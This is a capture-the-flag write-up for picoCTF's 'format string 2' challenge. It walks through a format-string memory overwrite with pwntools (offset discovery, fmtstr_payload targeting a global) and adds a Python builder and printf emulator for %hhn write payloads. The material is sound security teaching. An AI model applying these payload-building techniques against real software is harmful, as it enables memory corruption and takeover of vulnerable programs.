Description
This program is not impressed by cheap parlor tricks like reading arbitrary data off the stack. To impress this program you must change data on the stack!
Setup
Pwntools exploit
Download vuln/vuln.c for local analysis and install pwntools.
Interact with the remote instance at rhea.picoctf.net 64167.
wget https://artifacts.picoctf.net/c_rhea/15/vuln && \
wget https://artifacts.picoctf.net/c_rhea/15/vuln.c && \
pip install pwntools && \
nc rhea.picoctf.net 64167
Solution
This is the culmination of the format string series. After learning format specifiers in format string 0 and stack leaking in format string 1, you now use pwntools to overwrite memory and control program flow.
- Step 1: Find the offset. Use pwntools' FmtStr helper together with an exec_fmt callback (a function you write that sends a format string to the process and returns its output); the library sprays %p itself until it detects the stack offset of your buffer.
  autofmt = FmtStr(exec_fmt); offset = autofmt.offset
- Step 2: Craft the overwrite. Generate a payload that writes 0x67616c66 ("flag" as little-endian bytes) into address 0x404060 (the sus global). fmtstr_payload handles the padding and the %n-style writes for you.
  payload = fmtstr_payload(offset, {0x404060: 0x67616c66})
- Step 3: Send and read. Send the payload to the remote service. Once sus == 'flag', the program prints picoCTF{f0rm47_57r?_f0rm47_m3m_99...}.
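To see what fmtstr_payload is actually doing in Step 2, here is an added, self-contained example (not part of the original writeup and not pwntools code) that builds the same kind of %hhn write for sus and then checks it against a tiny printf model before anything is sent. It assumes the buffer starts at positional argument `offset` and is 8-byte aligned, as FmtStr reports it; the offset value 14 used below is a constructed stand-in for whatever FmtStr finds.

```python
import re
import struct

SUS_ADDR = 0x404060      # the sus global from the writeup
FLAG_VAL = 0x67616c66    # little-endian bytes b"flag"

def build_payload(offset, addr, value, nbytes=4):
    """One-byte-at-a-time %hhn write, the same idea as fmtstr_payload.
    Layout: [%Nc%K$hhn specifiers][pad to 8][addr, addr+1, ...].
    Addresses go last: 0x404060 packs with NUL bytes that end the string."""
    base = offset
    while True:                       # fixpoint: index digits change the prefix length
        fmt, count = b"", 0
        for i in range(nbytes):
            byte = (value >> (8 * i)) & 0xFF
            delta = (byte - count) % 256 or 256   # %0c still prints one char
            fmt += b"%%%dc%%%d$hhn" % (delta, base + i)
            count += delta
        fmt += b"A" * (-len(fmt) % 8)
        new_base = offset + len(fmt) // 8         # arg index of the first address
        if new_base == base:
            break
        base = new_base
    return fmt + b"".join(struct.pack("<Q", addr + i) for i in range(nbytes))

SPEC = re.compile(rb"%(\d+)c|%(\d+)\$hhn")

def emulate_printf(fmt, args):
    """Minimal printf model: counts output bytes, handles %Nc and %K$hhn, stops at NUL.
    args maps a 1-based positional index to the 8-byte stack word found there."""
    mem, count, i = {}, 0, 0
    while i < len(fmt) and fmt[i] != 0:
        m = SPEC.match(fmt, i)
        if m is None:                              # literal byte, just printed
            count, i = count + 1, i + 1
        elif m.group(1) is not None:               # %Nc pads the output
            count, i = count + max(int(m.group(1)), 1), m.end()
        else:                                      # %K$hhn stores low byte of count
            mem[args[int(m.group(2))]] = count & 0xFF
            i = m.end()
    return mem

def stack_args(payload, offset):
    """Positional args as the vulnerable printf sees them: buffer starts at arg `offset`."""
    words = [payload[i:i + 8].ljust(8, b"\0") for i in range(0, len(payload), 8)]
    return {offset + k: struct.unpack("<Q", w)[0] for k, w in enumerate(words)}

def written_bytes(offset=14, addr=SUS_ADDR, value=FLAG_VAL):
    """Bytes that land at addr after the model printf consumes our payload."""
    payload = build_payload(offset, addr, value)
    mem = emulate_printf(payload, stack_args(payload, offset))
    return bytes(mem[addr + i] for i in range(4))

if __name__ == "__main__":
    print(build_payload(14, SUS_ADDR, FLAG_VAL), written_bytes())  # ... b'flag'
```

Running the model on the generated payload is a cheap way to confirm the write lands before spending attempts on the remote service.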
Flag
picoCTF{f0rm47_57r?_f0rm47_m3m_99...}
Once sus reads "flag", the binary happily prints the real flag.